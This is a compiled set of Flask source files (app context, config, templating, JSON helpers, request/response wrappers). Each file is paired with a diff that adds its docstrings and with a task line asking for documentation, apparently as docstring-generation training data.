+ If an app context is active, the :data:`.g` and :data:`.current_app` context
+ proxies will available and ``True``, otherwise ``False``. You can use that
+ to test the data you use, rather than using this function.
+
+ from flask import g
+
+ if g:
+ g.cached_data = ...
+
+ .. versionadded:: 0.9
+ """
return _cv_app.get(None) is not None
class AppContext:
+ """An app context contains information about an app, and about the request
+ when handling a request. A context is pushed at the beginning of each
+ request and CLI command, and popped at the end. The context is referred to
+ as a "request context" if it has request information, and an "app context"
+ if not.
+
+ Do not use this class directly. Use :meth:`.Flask.app_context` to create an
+ app context if needed during setup, and :meth:`.Flask.test_request_context`
+ to create a request context if needed during tests.
+
+ When the context is popped, it will evaluate all the teardown functions
+ registered with :meth:`~flask.Flask.teardown_request` (if handling a
+ request) then :meth:`.Flask.teardown_appcontext`.
+
+ When using the interactive debugger, the context will be restored so
+ ``request`` is still accessible. Similarly, the test client can preserve the
+ context after the request ends. However, teardown functions may already have
+ closed some resources such as database connections, and will run again when
+ the restored context is popped.
+
+ :param app: The application this context represents.
+ :param request: The request data this context represents.
+ :param session: The session data this context represents. If not given,
+ loaded from the request on first access.
+
+ .. versionchanged:: 3.2
+ Merged with ``RequestContext``. The ``RequestContext`` alias will be
+ removed in Flask 4.0.
+
+ .. versionchanged:: 3.2
+ A combined app and request context is pushed for every request and CLI
+ command, rather than trying to detect if an app context is already
+ pushed.
+
+ .. versionchanged:: 3.2
+ The session is loaded the first time it is accessed, rather than when
+ the context is pushed.
+ """
def __init__(
self,
@@ -159,15 +338,29 @@
@classmethod
def from_environ(cls, app: Flask, environ: WSGIEnvironment, /) -> te.Self:
+ """Create an app context with request data from the given WSGI environ.
+
+ :param app: The application this context represents.
+ :param environ: The request data this context represents.
+ """
request = app.request_class(environ)
request.json_module = app.json
return cls(app, request=request)
@property
def has_request(self) -> bool:
+ """True if this context was created with request data."""
return self._request is not None
def copy(self) -> te.Self:
+ """Create a new context with the same data objects as this context. See
+ :func:`.copy_current_request_context`.
+
+ .. versionchanged:: 1.1
+ The current session data is used instead of reloading the original data.
+
+ .. versionadded:: 0.10
+ """
return self.__class__(
self.app,
request=self._request,
@@ -176,12 +369,17 @@
@property
def request(self) -> Request:
+ """The request object associated with this context. Accessed through
+ :data:`.request`. Only available in request contexts, otherwise raises
+ :exc:`RuntimeError`.
+ """
if self._request is None:
raise RuntimeError("There is no request in this context.")
return self._request
def _get_session(self) -> SessionMixin:
+ """Open the session if it is not already open for this request context."""
if self._request is None:
raise RuntimeError("There is no request in this context.")
@@ -196,11 +394,18 @@
@property
def session(self) -> SessionMixin:
+ """The session object associated with this context. Accessed through
+ :data:`.session`. Only available in request contexts, otherwise raises
+ :exc:`RuntimeError`. Accessing this sets :attr:`.SessionMixin.accessed`.
+ """
session = self._get_session()
session.accessed = True
return session
def match_request(self) -> None:
+ """Apply routing to the current request, storing either the matched
+ endpoint and args, or a routing exception.
+ """
try:
result = self.url_adapter.match(return_rule=True) # type: ignore[union-attr]
except HTTPException as e:
@@ -209,6 +414,17 @@ self._request.url_rule, self._request.view_args = result # type: ignore[union-attr]
def push(self) -> None:
+ """Push this context so that it is the active context. If this is a
+ request context, calls :meth:`match_request` to perform routing with
+ the context active.
+
+ Typically, this is not used directly. Instead, use a ``with`` block
+ to manage the context.
+
+ In some situations, such as streaming or testing, the context may be
+ pushed multiple times. It will only trigger matching and signals if it
+ is not currently pushed.
+ """
self._push_count += 1
if self._cv_token is not None:
@@ -228,6 +444,24 @@ self.match_request()
def pop(self, exc: BaseException | None = None) -> None:
+ """Pop this context so that it is no longer the active context. Then
+ call teardown functions and signals.
+
+ Typically, this is not used directly. Instead, use a ``with`` block
+ to manage the context.
+
+ This context must currently be the active context, otherwise a
+ :exc:`RuntimeError` is raised. In some situations, such as streaming or
+ testing, the context may have been pushed multiple times. It will only
+ trigger cleanup once it has been popped as many times as it was pushed.
+ Until then, it will remain the active context.
+
+ :param exc: An unhandled exception that was raised while the context was
+ active. Passed to teardown functions.
+
+ .. versionchanged:: 0.9
+ Added the ``exc`` argument.
+ """
if self._cv_token is None:
raise RuntimeError(f"Cannot pop this context ({self!r}), it is not pushed.")
@@ -303,4 +537,4 @@ )
return AppContext
- raise AttributeError(name)+ raise AttributeError(name)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/ctx.py |
Create docstrings for API functions | from __future__ import annotations
import errno
import json
import os
import types
import typing as t
from werkzeug.utils import import_string
if t.TYPE_CHECKING:
import typing_extensions as te
from .sansio.app import App
T = t.TypeVar("T")
class ConfigAttribute(t.Generic[T]):
def __init__(
self, name: str, get_converter: t.Callable[[t.Any], T] | None = None
) -> None:
self.__name__ = name
self.get_converter = get_converter
@t.overload
def __get__(self, obj: None, owner: None) -> te.Self: ...
@t.overload
def __get__(self, obj: App, owner: type[App]) -> T: ...
def __get__(self, obj: App | None, owner: type[App] | None = None) -> T | te.Self:
if obj is None:
return self
rv = obj.config[self.__name__]
if self.get_converter is not None:
rv = self.get_converter(rv)
return rv # type: ignore[no-any-return]
def __set__(self, obj: App, value: t.Any) -> None:
obj.config[self.__name__] = value
class Config(dict): # type: ignore[type-arg]
def __init__(
self,
root_path: str | os.PathLike[str],
defaults: dict[str, t.Any] | None = None,
) -> None:
super().__init__(defaults or {})
self.root_path = root_path
def from_envvar(self, variable_name: str, silent: bool = False) -> bool:
rv = os.environ.get(variable_name)
if not rv:
if silent:
return False
raise RuntimeError(
f"The environment variable {variable_name!r} is not set"
" and as such configuration could not be loaded. Set"
" this variable and make it point to a configuration"
" file"
)
return self.from_pyfile(rv, silent=silent)
def from_prefixed_env(
self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads
) -> bool:
prefix = f"{prefix}_"
for key in sorted(os.environ):
if not key.startswith(prefix):
continue
value = os.environ[key]
key = key.removeprefix(prefix)
try:
value = loads(value)
except Exception:
# Keep the value as a string if loading failed.
pass
if "__" not in key:
# A non-nested key, set directly.
self[key] = value
continue
# Traverse nested dictionaries with keys separated by "__".
current = self
*parts, tail = key.split("__")
for part in parts:
# If an intermediate dict does not exist, create it.
if part not in current:
current[part] = {}
current = current[part]
current[tail] = value
return True
def from_pyfile(
self, filename: str | os.PathLike[str], silent: bool = False
) -> bool:
filename = os.path.join(self.root_path, filename)
d = types.ModuleType("config")
d.__file__ = filename
try:
with open(filename, mode="rb") as config_file:
exec(compile(config_file.read(), filename, "exec"), d.__dict__)
except OSError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR):
return False
e.strerror = f"Unable to load configuration file ({e.strerror})"
raise
self.from_object(d)
return True
def from_object(self, obj: object | str) -> None:
if isinstance(obj, str):
obj = import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def from_file(
self,
filename: str | os.PathLike[str],
load: t.Callable[[t.IO[t.Any]], t.Mapping[str, t.Any]],
silent: bool = False,
text: bool = True,
) -> bool:
filename = os.path.join(self.root_path, filename)
try:
with open(filename, "r" if text else "rb") as f:
obj = load(f)
except OSError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR):
return False
e.strerror = f"Unable to load configuration file ({e.strerror})"
raise
return self.from_mapping(obj)
def from_mapping(
self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any
) -> bool:
mappings: dict[str, t.Any] = {}
if mapping is not None:
mappings.update(mapping)
mappings.update(kwargs)
for key, value in mappings.items():
if key.isupper():
self[key] = value
return True
def get_namespace(
self, namespace: str, lowercase: bool = True, trim_namespace: bool = True
) -> dict[str, t.Any]:
rv = {}
for k, v in self.items():
if not k.startswith(namespace):
continue
if trim_namespace:
key = k[len(namespace) :]
else:
key = k
if lowercase:
key = key.lower()
rv[key] = v
return rv
def __repr__(self) -> str:
return f"<{type(self).__name__} {dict.__repr__(self)}>" | --- +++ @@ -18,6 +18,7 @@
class ConfigAttribute(t.Generic[T]):
+ """Makes an attribute forward to the config"""
def __init__(
self, name: str, get_converter: t.Callable[[t.Any], T] | None = None
@@ -47,6 +48,48 @@
class Config(dict): # type: ignore[type-arg]
+ """Works exactly like a dict but provides ways to fill it from files
+ or special dictionaries. There are two common patterns to populate the
+ config.
+
+ Either you can fill the config from a config file::
+
+ app.config.from_pyfile('yourconfig.cfg')
+
+ Or alternatively you can define the configuration options in the
+ module that calls :meth:`from_object` or provide an import path to
+ a module that should be loaded. It is also possible to tell it to
+ use the same module and with that provide the configuration values
+ just before the call::
+
+ DEBUG = True
+ SECRET_KEY = 'development key'
+ app.config.from_object(__name__)
+
+ In both cases (loading from any Python file or loading from modules),
+ only uppercase keys are added to the config. This makes it possible to use
+ lowercase values in the config file for temporary values that are not added
+ to the config or to define the config keys in the same file that implements
+ the application.
+
+ Probably the most interesting way to load configurations is from an
+ environment variable pointing to a file::
+
+ app.config.from_envvar('YOURAPPLICATION_SETTINGS')
+
+ In this case before launching the application you have to set this
+ environment variable to the file you want to use. On Linux and OS X
+ use the export statement::
+
+ export YOURAPPLICATION_SETTINGS='/path/to/config/file'
+
+ On windows use `set` instead.
+
+ :param root_path: path to which files are read relative from. When the
+ config object is created by the application, this is
+ the application's :attr:`~flask.Flask.root_path`.
+ :param defaults: an optional dictionary of default values
+ """
def __init__(
self,
@@ -57,6 +100,17 @@ self.root_path = root_path
def from_envvar(self, variable_name: str, silent: bool = False) -> bool:
+ """Loads a configuration from an environment variable pointing to
+ a configuration file. This is basically just a shortcut with nicer
+ error messages for this line of code::
+
+ app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS'])
+
+ :param variable_name: name of the environment variable
+ :param silent: set to ``True`` if you want silent failure for missing
+ files.
+ :return: ``True`` if the file was loaded successfully.
+ """
rv = os.environ.get(variable_name)
if not rv:
if silent:
@@ -72,6 +126,29 @@ def from_prefixed_env(
self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads
) -> bool:
+ """Load any environment variables that start with ``FLASK_``,
+ dropping the prefix from the env key for the config key. Values
+ are passed through a loading function to attempt to convert them
+ to more specific types than strings.
+
+ Keys are loaded in :func:`sorted` order.
+
+ The default loading function attempts to parse values as any
+ valid JSON type, including dicts and lists.
+
+ Specific items in nested dicts can be set by separating the
+ keys with double underscores (``__``). If an intermediate key
+ doesn't exist, it will be initialized to an empty dict.
+
+ :param prefix: Load env vars that start with this prefix,
+ separated with an underscore (``_``).
+ :param loads: Pass each string value to this function and use
+ the returned value as the config value. If any error is
+ raised it is ignored and the value remains a string. The
+ default is :func:`json.loads`.
+
+ .. versionadded:: 2.1
+ """
prefix = f"{prefix}_"
for key in sorted(os.environ):
@@ -110,6 +187,20 @@ def from_pyfile(
self, filename: str | os.PathLike[str], silent: bool = False
) -> bool:
+ """Updates the values in the config from a Python file. This function
+ behaves as if the file was imported as module with the
+ :meth:`from_object` function.
+
+ :param filename: the filename of the config. This can either be an
+ absolute filename or a filename relative to the
+ root path.
+ :param silent: set to ``True`` if you want silent failure for missing
+ files.
+ :return: ``True`` if the file was loaded successfully.
+
+ .. versionadded:: 0.7
+ `silent` parameter.
+ """
filename = os.path.join(self.root_path, filename)
d = types.ModuleType("config")
d.__file__ = filename
@@ -125,6 +216,37 @@ return True
def from_object(self, obj: object | str) -> None:
+ """Updates the values from the given object. An object can be of one
+ of the following two types:
+
+ - a string: in this case the object with that name will be imported
+ - an actual object reference: that object is used directly
+
+ Objects are usually either modules or classes. :meth:`from_object`
+ loads only the uppercase attributes of the module/class. A ``dict``
+ object will not work with :meth:`from_object` because the keys of a
+ ``dict`` are not attributes of the ``dict`` class.
+
+ Example of module-based configuration::
+
+ app.config.from_object('yourapplication.default_config')
+ from yourapplication import default_config
+ app.config.from_object(default_config)
+
+ Nothing is done to the object before loading. If the object is a
+ class and has ``@property`` attributes, it needs to be
+ instantiated before being passed to this method.
+
+ You should not use this function to load the actual configuration but
+ rather configuration defaults. The actual config should be loaded
+ with :meth:`from_pyfile` and ideally from a location not within the
+ package because the package might be installed system wide.
+
+ See :ref:`config-dev-prod` for an example of class-based configuration
+ using :meth:`from_object`.
+
+ :param obj: an import name or object
+ """
if isinstance(obj, str):
obj = import_string(obj)
for key in dir(obj):
@@ -138,6 +260,33 @@ silent: bool = False,
text: bool = True,
) -> bool:
+ """Update the values in the config from a file that is loaded
+ using the ``load`` parameter. The loaded data is passed to the
+ :meth:`from_mapping` method.
+
+ .. code-block:: python
+
+ import json
+ app.config.from_file("config.json", load=json.load)
+
+ import tomllib
+ app.config.from_file("config.toml", load=tomllib.load, text=False)
+
+ :param filename: The path to the data file. This can be an
+ absolute path or relative to the config root path.
+ :param load: A callable that takes a file handle and returns a
+ mapping of loaded data from the file.
+ :type load: ``Callable[[Reader], Mapping]`` where ``Reader``
+ implements a ``read`` method.
+ :param silent: Ignore the file if it doesn't exist.
+ :param text: Open the file in text or binary mode.
+ :return: ``True`` if the file was loaded successfully.
+
+ .. versionchanged:: 2.3
+ The ``text`` parameter was added.
+
+ .. versionadded:: 2.0
+ """
filename = os.path.join(self.root_path, filename)
try:
@@ -155,6 +304,13 @@ def from_mapping(
self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any
) -> bool:
+ """Updates the config like :meth:`update` ignoring items with
+ non-upper keys.
+
+ :return: Always returns ``True``.
+
+ .. versionadded:: 0.11
+ """
mappings: dict[str, t.Any] = {}
if mapping is not None:
mappings.update(mapping)
@@ -167,6 +323,33 @@ def get_namespace(
self, namespace: str, lowercase: bool = True, trim_namespace: bool = True
) -> dict[str, t.Any]:
+ """Returns a dictionary containing a subset of configuration options
+ that match the specified namespace/prefix. Example usage::
+
+ app.config['IMAGE_STORE_TYPE'] = 'fs'
+ app.config['IMAGE_STORE_PATH'] = '/var/app/images'
+ app.config['IMAGE_STORE_BASE_URL'] = 'http://img.website.com'
+ image_store_config = app.config.get_namespace('IMAGE_STORE_')
+
+ The resulting dictionary `image_store_config` would look like::
+
+ {
+ 'type': 'fs',
+ 'path': '/var/app/images',
+ 'base_url': 'http://img.website.com'
+ }
+
+ This is often useful when configuration options map directly to
+ keyword arguments in functions or class constructors.
+
+ :param namespace: a configuration namespace
+ :param lowercase: a flag indicating if the keys of the resulting
+ dictionary should be lowercase
+ :param trim_namespace: a flag indicating if the keys of the resulting
+ dictionary should not include the namespace
+
+ .. versionadded:: 0.11
+ """
rv = {}
for k, v in self.items():
if not k.startswith(namespace):
@@ -181,4 +364,4 @@ return rv
def __repr__(self) -> str:
- return f"<{type(self).__name__} {dict.__repr__(self)}>"+ return f"<{type(self).__name__} {dict.__repr__(self)}>"
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/config.py |
Write docstrings for data processing functions | from __future__ import annotations
import typing as t
from jinja2 import BaseLoader
from jinja2 import Environment as BaseEnvironment
from jinja2 import Template
from jinja2 import TemplateNotFound
from .ctx import AppContext
from .globals import app_ctx
from .helpers import stream_with_context
from .signals import before_render_template
from .signals import template_rendered
if t.TYPE_CHECKING: # pragma: no cover
from .sansio.app import App
from .sansio.scaffold import Scaffold
def _default_template_ctx_processor() -> dict[str, t.Any]:
ctx = app_ctx._get_current_object()
rv: dict[str, t.Any] = {"g": ctx.g}
if ctx.has_request:
rv["request"] = ctx.request
# The session proxy cannot be replaced, accessing it gets
# RequestContext.session, which sets session.accessed.
return rv
class Environment(BaseEnvironment):
def __init__(self, app: App, **options: t.Any) -> None:
if "loader" not in options:
options["loader"] = app.create_global_jinja_loader()
BaseEnvironment.__init__(self, **options)
self.app = app
class DispatchingJinjaLoader(BaseLoader):
def __init__(self, app: App) -> None:
self.app = app
def get_source(
self, environment: BaseEnvironment, template: str
) -> tuple[str, str | None, t.Callable[[], bool] | None]:
if self.app.config["EXPLAIN_TEMPLATE_LOADING"]:
return self._get_source_explained(environment, template)
return self._get_source_fast(environment, template)
def _get_source_explained(
self, environment: BaseEnvironment, template: str
) -> tuple[str, str | None, t.Callable[[], bool] | None]:
attempts = []
rv: tuple[str, str | None, t.Callable[[], bool] | None] | None
trv: None | (tuple[str, str | None, t.Callable[[], bool] | None]) = None
for srcobj, loader in self._iter_loaders(template):
try:
rv = loader.get_source(environment, template)
if trv is None:
trv = rv
except TemplateNotFound:
rv = None
attempts.append((loader, srcobj, rv))
from .debughelpers import explain_template_loading_attempts
explain_template_loading_attempts(self.app, template, attempts)
if trv is not None:
return trv
raise TemplateNotFound(template)
def _get_source_fast(
self, environment: BaseEnvironment, template: str
) -> tuple[str, str | None, t.Callable[[], bool] | None]:
for _srcobj, loader in self._iter_loaders(template):
try:
return loader.get_source(environment, template)
except TemplateNotFound:
continue
raise TemplateNotFound(template)
def _iter_loaders(self, template: str) -> t.Iterator[tuple[Scaffold, BaseLoader]]:
loader = self.app.jinja_loader
if loader is not None:
yield self.app, loader
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
yield blueprint, loader
def list_templates(self) -> list[str]:
result = set()
loader = self.app.jinja_loader
if loader is not None:
result.update(loader.list_templates())
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
for template in loader.list_templates():
result.add(template)
return list(result)
def _render(ctx: AppContext, template: Template, context: dict[str, t.Any]) -> str:
app = ctx.app
app.update_template_context(ctx, context)
before_render_template.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
rv = template.render(context)
template_rendered.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
return rv
def render_template(
template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> str:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _render(ctx, template, context)
def render_template_string(source: str, **context: t.Any) -> str:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
return _render(ctx, template, context)
def _stream(
ctx: AppContext, template: Template, context: dict[str, t.Any]
) -> t.Iterator[str]:
app = ctx.app
app.update_template_context(ctx, context)
before_render_template.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
def generate() -> t.Iterator[str]:
yield from template.generate(context)
template_rendered.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
return stream_with_context(generate())
def stream_template(
template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> t.Iterator[str]:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _stream(ctx, template, context)
def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
return _stream(ctx, template, context) | --- +++ @@ -19,6 +19,9 @@
def _default_template_ctx_processor() -> dict[str, t.Any]:
+ """Default template context processor. Replaces the ``request`` and ``g``
+ proxies with their concrete objects for faster access.
+ """
ctx = app_ctx._get_current_object()
rv: dict[str, t.Any] = {"g": ctx.g}
@@ -31,6 +34,10 @@
class Environment(BaseEnvironment):
+ """Works like a regular Jinja environment but has some additional
+ knowledge of how Flask's blueprint works so that it can prepend the
+ name of the blueprint to referenced templates if necessary.
+ """
def __init__(self, app: App, **options: t.Any) -> None:
if "loader" not in options:
@@ -40,6 +47,9 @@
class DispatchingJinjaLoader(BaseLoader):
+ """A loader that looks for templates in the application and all
+ the blueprint folders.
+ """
def __init__(self, app: App) -> None:
self.app = app
@@ -127,12 +137,24 @@ template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> str:
+ """Render a template by name with the given context.
+
+ :param template_name_or_list: The name of the template to render. If
+ a list is given, the first name to exist will be rendered.
+ :param context: The variables to make available in the template.
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _render(ctx, template, context)
def render_template_string(source: str, **context: t.Any) -> str:
+ """Render a template from the given source string with the given
+ context.
+
+ :param source: The source code of the template to render.
+ :param context: The variables to make available in the template.
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
return _render(ctx, template, context)
@@ -160,12 +182,31 @@ template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> t.Iterator[str]:
+ """Render a template by name with the given context as a stream.
+ This returns an iterator of strings, which can be used as a
+ streaming response from a view.
+
+ :param template_name_or_list: The name of the template to render. If
+ a list is given, the first name to exist will be rendered.
+ :param context: The variables to make available in the template.
+
+ .. versionadded:: 2.2
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _stream(ctx, template, context)
def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]:
+ """Render a template from the given source string with the given
+ context as a stream. This returns an iterator of strings, which can
+ be used as a streaming response from a view.
+
+ :param source: The source code of the template to render.
+ :param context: The variables to make available in the template.
+
+ .. versionadded:: 2.2
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
- return _stream(ctx, template, context)+ return _stream(ctx, template, context)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/templating.py |
Add detailed documentation for each class | from __future__ import annotations
import json as _json
import typing as t
from ..globals import current_app
from .provider import _default
if t.TYPE_CHECKING: # pragma: no cover
from ..wrappers import Response
def dumps(obj: t.Any, **kwargs: t.Any) -> str:
if current_app:
return current_app.json.dumps(obj, **kwargs)
kwargs.setdefault("default", _default)
return _json.dumps(obj, **kwargs)
def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
if current_app:
current_app.json.dump(obj, fp, **kwargs)
else:
kwargs.setdefault("default", _default)
_json.dump(obj, fp, **kwargs)
def loads(s: str | bytes, **kwargs: t.Any) -> t.Any:
if current_app:
return current_app.json.loads(s, **kwargs)
return _json.loads(s, **kwargs)
def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
if current_app:
return current_app.json.load(fp, **kwargs)
return _json.load(fp, **kwargs)
def jsonify(*args: t.Any, **kwargs: t.Any) -> Response:
return current_app.json.response(*args, **kwargs) # type: ignore[return-value] | --- +++ @@ -11,6 +11,32 @@
def dumps(obj: t.Any, **kwargs: t.Any) -> str:
+ """Serialize data as JSON.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.dumps() <flask.json.provider.JSONProvider.dumps>`
+ method, otherwise it will use :func:`json.dumps`.
+
+ :param obj: The data to serialize.
+ :param kwargs: Arguments passed to the ``dumps`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.dumps``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0.2
+ :class:`decimal.Decimal` is supported by converting to a string.
+
+ .. versionchanged:: 2.0
+ ``encoding`` will be removed in Flask 2.1.
+
+ .. versionchanged:: 1.0.3
+ ``app`` can be passed directly, rather than requiring an app
+ context for configuration.
+ """
if current_app:
return current_app.json.dumps(obj, **kwargs)
@@ -19,6 +45,28 @@
def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
+ """Serialize data as JSON and write to a file.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.dump() <flask.json.provider.JSONProvider.dump>`
+ method, otherwise it will use :func:`json.dump`.
+
+ :param obj: The data to serialize.
+ :param fp: A file opened for writing text. Should use the UTF-8
+ encoding to be valid JSON.
+ :param kwargs: Arguments passed to the ``dump`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.dump``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0
+ Writing to a binary file, and the ``encoding`` argument, will be
+ removed in Flask 2.1.
+ """
if current_app:
current_app.json.dump(obj, fp, **kwargs)
else:
@@ -27,6 +75,30 @@
def loads(s: str | bytes, **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.loads() <flask.json.provider.JSONProvider.loads>`
+ method, otherwise it will use :func:`json.loads`.
+
+ :param s: Text or UTF-8 bytes.
+ :param kwargs: Arguments passed to the ``loads`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.loads``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0
+ ``encoding`` will be removed in Flask 2.1. The data must be a
+ string or UTF-8 bytes.
+
+ .. versionchanged:: 1.0.3
+ ``app`` can be passed directly, rather than requiring an app
+ context for configuration.
+ """
if current_app:
return current_app.json.loads(s, **kwargs)
@@ -34,6 +106,29 @@
def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON read from a file.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.load() <flask.json.provider.JSONProvider.load>`
+ method, otherwise it will use :func:`json.load`.
+
+ :param fp: A file opened for reading text or UTF-8 bytes.
+ :param kwargs: Arguments passed to the ``load`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.load``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.2
+ The ``app`` parameter will be removed in Flask 2.3.
+
+ .. versionchanged:: 2.0
+ ``encoding`` will be removed in Flask 2.1. The file must be text
+ mode, or binary mode with UTF-8 bytes.
+ """
if current_app:
return current_app.json.load(fp, **kwargs)
@@ -41,4 +136,35 @@
def jsonify(*args: t.Any, **kwargs: t.Any) -> Response:
- return current_app.json.response(*args, **kwargs) # type: ignore[return-value]+ """Serialize the given arguments as JSON, and return a
+ :class:`~flask.Response` object with the ``application/json``
+ mimetype. A dict or list returned from a view will be converted to a
+ JSON response automatically without needing to call this.
+
+ This requires an active app context, and calls
+ :meth:`app.json.response() <flask.json.provider.JSONProvider.response>`.
+
+ In debug mode, the output is formatted with indentation to make it
+ easier to read. This may also be controlled by the provider.
+
+ Either positional or keyword arguments can be given, not both.
+ If no arguments are given, ``None`` is serialized.
+
+ :param args: A single value to serialize, or multiple values to
+ treat as a list to serialize.
+ :param kwargs: Treat as a dict to serialize.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.response``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0.2
+ :class:`decimal.Decimal` is supported by converting to a string.
+
+ .. versionchanged:: 0.11
+ Added support for serializing top-level arrays. This was a
+ security risk in ancient browsers. See :ref:`security-json`.
+
+ .. versionadded:: 0.2
+ """
+ return current_app.json.response(*args, **kwargs) # type: ignore[return-value]
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/json/__init__.py |
Add docstrings with type hints explained | from __future__ import annotations
import typing as t
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import HTTPException
from werkzeug.wrappers import Request as RequestBase
from werkzeug.wrappers import Response as ResponseBase
from . import json
from .globals import current_app
from .helpers import _split_blueprint_path
if t.TYPE_CHECKING: # pragma: no cover
from werkzeug.routing import Rule
class Request(RequestBase):
json_module: t.Any = json
#: The internal URL rule that matched the request. This can be
#: useful to inspect which methods are allowed for the URL from
#: a before/after handler (``request.url_rule.methods``) etc.
#: Though if the request's method was invalid for the URL rule,
#: the valid list is available in ``routing_exception.valid_methods``
#: instead (an attribute of the Werkzeug exception
#: :exc:`~werkzeug.exceptions.MethodNotAllowed`)
#: because the request was never internally bound.
#:
#: .. versionadded:: 0.6
url_rule: Rule | None = None
#: A dict of view arguments that matched the request. If an exception
#: happened when matching, this will be ``None``.
view_args: dict[str, t.Any] | None = None
#: If matching the URL failed, this is the exception that will be
#: raised / was raised as part of the request handling. This is
#: usually a :exc:`~werkzeug.exceptions.NotFound` exception or
#: something similar.
routing_exception: HTTPException | None = None
_max_content_length: int | None = None
_max_form_memory_size: int | None = None
_max_form_parts: int | None = None
@property
def max_content_length(self) -> int | None:
if self._max_content_length is not None:
return self._max_content_length
if not current_app:
return super().max_content_length
return current_app.config["MAX_CONTENT_LENGTH"] # type: ignore[no-any-return]
@max_content_length.setter
def max_content_length(self, value: int | None) -> None:
self._max_content_length = value
@property
def max_form_memory_size(self) -> int | None:
if self._max_form_memory_size is not None:
return self._max_form_memory_size
if not current_app:
return super().max_form_memory_size
return current_app.config["MAX_FORM_MEMORY_SIZE"] # type: ignore[no-any-return]
@max_form_memory_size.setter
def max_form_memory_size(self, value: int | None) -> None:
self._max_form_memory_size = value
@property # type: ignore[override]
def max_form_parts(self) -> int | None:
if self._max_form_parts is not None:
return self._max_form_parts
if not current_app:
return super().max_form_parts
return current_app.config["MAX_FORM_PARTS"] # type: ignore[no-any-return]
@max_form_parts.setter
def max_form_parts(self, value: int | None) -> None:
self._max_form_parts = value
@property
def endpoint(self) -> str | None:
if self.url_rule is not None:
return self.url_rule.endpoint # type: ignore[no-any-return]
return None
@property
def blueprint(self) -> str | None:
endpoint = self.endpoint
if endpoint is not None and "." in endpoint:
return endpoint.rpartition(".")[0]
return None
@property
def blueprints(self) -> list[str]:
name = self.blueprint
if name is None:
return []
return _split_blueprint_path(name)
def _load_form_data(self) -> None:
super()._load_form_data()
# In debug mode we're replacing the files multidict with an ad-hoc
# subclass that raises a different error for key errors.
if (
current_app
and current_app.debug
and self.mimetype != "multipart/form-data"
and not self.files
):
from .debughelpers import attach_enctype_error_multidict
attach_enctype_error_multidict(self)
def on_json_loading_failed(self, e: ValueError | None) -> t.Any:
try:
return super().on_json_loading_failed(e)
except BadRequest as ebr:
if current_app and current_app.debug:
raise
raise BadRequest() from ebr
class Response(ResponseBase):
default_mimetype: str | None = "text/html"
json_module = json
autocorrect_location_header = False
@property
def max_cookie_size(self) -> int: # type: ignore
if current_app:
return current_app.config["MAX_COOKIE_SIZE"] # type: ignore[no-any-return]
# return Werkzeug's default when not in an app context
return super().max_cookie_size | --- +++ @@ -16,6 +16,17 @@
class Request(RequestBase):
+ """The request object used by default in Flask. Remembers the
+ matched endpoint and view arguments.
+
